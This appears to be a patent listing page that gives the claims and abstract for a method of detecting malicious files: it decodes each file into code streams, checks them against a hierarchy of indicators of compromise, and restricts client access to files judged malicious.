Detection and remediation of potentially malicious files
First Claim
Patent Images
1. A method comprising:
- obtaining a potentially malicious file;
decoding the file to identify one or more code streams;
processing each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise;
determining whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and
modifying access by a given client device to the file responsive to determining that the file is malicious;
wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise;
wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy; and
wherein the method is performed by at least one processing device comprising a processor coupled to a memory.
9 Assignments
0 Petitions
Accused Products
Abstract
A method comprises obtaining a potentially malicious file, decoding the file to identify one or more code streams, processing each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise, determining whether the file is malicious based on the presence of one or more of the indicators of compromise in the code streams, and modifying access by a given client device to the file responsive to determining that the file is malicious.
-
Citations
20 Claims
-
1. A method comprising:
-
obtaining a potentially malicious file; decoding the file to identify one or more code streams; processing each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise; determining whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and modifying access by a given client device to the file responsive to determining that the file is malicious; wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise; wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy; and wherein the method is performed by at least one processing device comprising a processor coupled to a memory. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 19, 20)
-
-
15. A computer program product comprising a non-transitory processor-readable storage medium having stored therein program code of one or more software programs, wherein the program code when executed by a processing device cause the processing device:
-
to obtain a potentially malicious file; to decode the file to identify one or more code streams; to process each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise; to determine whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and to modify access by a given client device to the file responsive to determining that the file is malicious; wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise; and wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy. - View Dependent Claims (16)
-
-
17. An apparatus comprising:
-
a processing device comprising a processor coupled to a memory; the processing device being configured; to obtain a potentially malicious file; to decode the file to identify one or more code streams; to process each of the identified code streams to determine the presence of respective ones of a set of indicators of compromise; to determine whether the file is malicious based at least in part on the presence of one or more of the indicators of compromise in the code streams; and to modify access by a given client device to the file responsive to determining that the file is malicious; wherein the set of indicators of compromise are arranged in a hierarchy from one or more relatively benign indicators of compromise to one or more relatively malicious indicators of compromise; and wherein processing each of the identified code streams to determine the presence of respective ones of the set of indicators of compromise comprises checking for the presence of respective ones of the set of indicators in an order determined based at least in part on the hierarchy. - View Dependent Claims (18)
-
Specification